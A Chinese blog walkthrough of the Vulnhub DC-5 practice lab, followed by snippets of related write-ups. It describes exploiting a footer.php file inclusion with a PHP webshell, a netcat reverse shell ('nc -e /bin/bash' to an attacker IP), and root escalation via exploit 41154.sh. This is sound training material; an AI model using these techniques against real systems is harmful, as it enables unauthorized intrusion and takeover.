【Vulnhub】DC-5

最新推荐文章于 2025-01-16 12:00:36 发布
原创 最新推荐文章于 2025-01-16 12:00:36 发布 · 101 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章描述了一次针对简单网站的安全测试过程,通过文件包含漏洞发现了一个可变值的/footer.php页面,利用PHP代码注入并借助蚁剑工具进行反弹shell。在提权阶段,通过searchexploit寻找漏洞利用,并成功获取root权限,强调了基础安全知识的重要性。

信息收集

只开了80,111
111在之前查过,没啥有用的,直接访问网站。

网页

很简单的网站,只有这一个地方能提交
在这里插入图片描述
扫目录,挨个访问一下,有一个奇怪的页面/footer.php,看着只是一个简单的标签,但是不知道为什么你一直刷新它的那个值一直变化,2017,2018,2019 在这里插入图片描述在这里插入图片描述
我出了一个问题一直卡着,想了半天才看见,提交php代码时,在它的网页格子内提交没用,只能在数据包内改请求头
在这里插入图片描述
然后按照上面的方法放入一句话木马,蚁剑连接
在这里插入图片描述

nc -e /bin/bash 192.168.83.128 4444
反弹到kali

提权

看有什么suid提权,系统版本有什么漏洞。
本来还没看出来什么,看别人写的,这东西这么难注意。。。。
在这里插入图片描述

下来search exploit ,然后将exp直接通过蚁剑上传,执行之后就是root权限
没执行权限就

chmod +x 41154.sh

在这里插入图片描述

总结

这个靶机还是考察的最基础的文件包含漏洞和nginx的任意文件解析漏洞,基础还是要扎实一点,提权那块我是真没想到那个东西,以后遇见陌生的就搜一搜

vulnhub DC-5 靶机 渗透测试
小松博客
05-23 446
我们把这个文件复制出来 /usr/share/exploitdb/exploits/linux/local/41154.sh。进入shell模式,输入命令find / -perm /4000 2>/dev/null,查找具有SUID权限的命令。发现这下面的时间是在变的,每次刷新都不一样,这里和footer.php的php是一样的,所以我们推测是文件包含漏洞。注意,请不要在kali里面编译,亲测编译后的程序在靶机运行会报错,我是在Centos中编译的。发现一个footer.php,发现每次访问都不一样。
Vulnhub打靶-DC-1
jnszstmei的博客
10-25 1048
框架漏洞的发现和利用以及利用cms的特性进行管理员密码的更改,实现对靶机的渗透并获取root权限
Vulnhub-DC-5
06-08 1323
靶机IP:192.168.20.139网络有问题的可以看下。
Vulnhub DC-5
柠檬木有枝
07-14 435
nmap -sS 192.168.6.0/24 扫描主机 访问服务,发现文件包含漏洞 写入一句话木马至日志文件,访包含日志文件获取 shell find / -perm -u=s -type f 2>/dev/null,查看有suid命令,发现 screen-4.5.0 有点可疑 searchexploit 查看可用的 exp 上传 41151.sh libhax.so roots...
vulnhub--DC5
weixin_55129870的博客
05-19 445
kali ip :192.168.44.131 主机发现 nmap -sP 192.168.44.0/24 DC-5 IP:192.168.44.145 端口探测 nmap -A -p1-65535 -T4 192.168.44.145 发现有一个80端口和111端口并且运行着rpcinfo服务,44040 访问http服务 发现留言板 提交XSS没有反应,但是提交时,底部时间会刷新变化 dirsearch 扫描 dirsearch是一个基于pyth...
Vulnhub DC-7
Pai_Space
03-26 5614
明确:《中华人民共和国网络安全法》 Description DC-7 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. While this isn't an overly technical challenge, it isn't exactly easy. While it's kind of a logic..
VulnHub DC-1
烟敛寒林的博客
09-05 599
靶机配置及说明 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/靶机:DC1 (VirtualBox) IP:192.168.10.103攻击机:Kali(VMware ) IP:192.168.10.104说明:DC1需要找到5个flag,最终目标是在root的主目录中找到并读取该flag 关于每个flag的知识点 1、msf的熟练使用以及搜索可利用漏洞(Drupal)2、留意目标网站的配置文件(more慢慢查看别错过重要信息...
Vulnhub - DC-1
qq_46081990的博客
03-14 551
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
Vulnhub靶场----5DC-5
七天
03-14 813
用户输入数据,Nginx日志会记录用户输入,将木马或者命令写入Nginx日志,利用文件包含日志,就可以将用户输入以PHP格式执行。1.访问http://192.168.144.153,点击contact页面。网站指纹探测、查看页面内容、目录枚举、网页源代码信息泄露;2.利用文件包含使上传的文件以PHP格式执行。4.使用python生成交互式shell。1.查找以root权限运行的组件。1.利用文件包含写入一句话木马。开放端口是80、36888。3、文件包含利用 获取权限。3.路径存在文件包含。
Vulnhub DC-8
Pai_Space
04-05 1095
明确:《中华人民共和国网络安全法》 Description DC-8 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. This challenge is a bit of a hybrid between being an actual challenge, and being a "proof of conce..
Vulnhub DC-8靶机攻击实战(一)
初学者
01-16 1381
Vulnhub DC-8靶机教程来了,好久没有更新打靶的教程了,这次我们在来更新一期关于Vulnhub DC-8的打靶训练,如下所示。
vulnhub DC-4靶机实战
m0_51195235的博客
10-04 2456
vulnhub DC-4靶机实战
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8836
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于改进YOLOv8算法实现高精度实时安全带使用状态智能监测与预警的深度学习目标检测系统源码及完整项目实践指南_包含2300张高质量标注图像的安全带专用数据集YOLOv8目标检测.zip
最新发布
12-06
基于改进YOLOv8算法实现高精度实时安全带使用状态智能监测与预警的深度学习目标检测系统源码及完整项目实践指南_包含2300张高质量标注图像的安全带专用数据集YOLOv8目标检测.zip
MiniBtMaster_minibt_16940_1764966207180.zip
12-06
MiniBtMaster_minibt_16940_1764966207180.zip
本项目是一个专为Linux系统设计的自动化安装与回滚管理工具集_它包含针对MySQL数据库Redis缓存服务器以及NginxWeb服务器的一键部署脚本_通过参数化命令实现快速安装与.zip
12-06
本项目是一个专为Linux系统设计的自动化安装与回滚管理工具集_它包含针对MySQL数据库Redis缓存服务器以及NginxWeb服务器的一键部署脚本_通过参数化命令实现快速安装与.zip
无线传感器网络(WSN)中的节能睡眠调度和基于树状的集群路由协议.zip
12-06
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
跟网型逆变器小干扰稳定性分析与控制策略优化研究(Simulink仿真实现)
12-06
跟网型逆变器小干扰稳定性分析与控制策略优化研究(Simulink仿真实现)内容概要:本文围绕跟网型逆变器的小干扰稳定性展开分析,重点研究其控制策略的优化方法,并通过Simulink进行仿真实现。研究内容涵盖含分布式电源的配电网中逆变器的动态响应特性、小干扰下的系统稳定性判据,以及提升稳定性的控制策略设计与验证,旨在提升新能源并网系统的稳定性和可靠性。; 适合人群:从事电力系统、新能源并网、逆变器控制等相关领域的科研人员及电气工程专业的研究生。; 使用场景及目标:① 分析跟网型逆变器在小干扰下的稳定性问题;② 设计并优化逆变器控制策略以提升系统稳定性;③ 利用Simulink搭建仿真模型验证理论分析与控制方案的有效性。; 阅读建议:建议结合文中提供的Simulink仿真模型深入理解控制策略的设计逻辑与稳定性分析过程,重点关注系统建模、控制参数调节与仿真结果分析之间的关联,以提升实际科研与工程应用能力。
vulnhub dc-4
03-23
### 关于 VulnHub 上的 DC-4 虚拟机镜像 VulnHub 是一个提供各种渗透测试练习环境的平台,其中 DC 系列是非常受欢迎的一组靶场。对于 DC-4 的具体下载和操作指南,虽然当前未有直接提及 DC-4 的引用内容,但可以...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值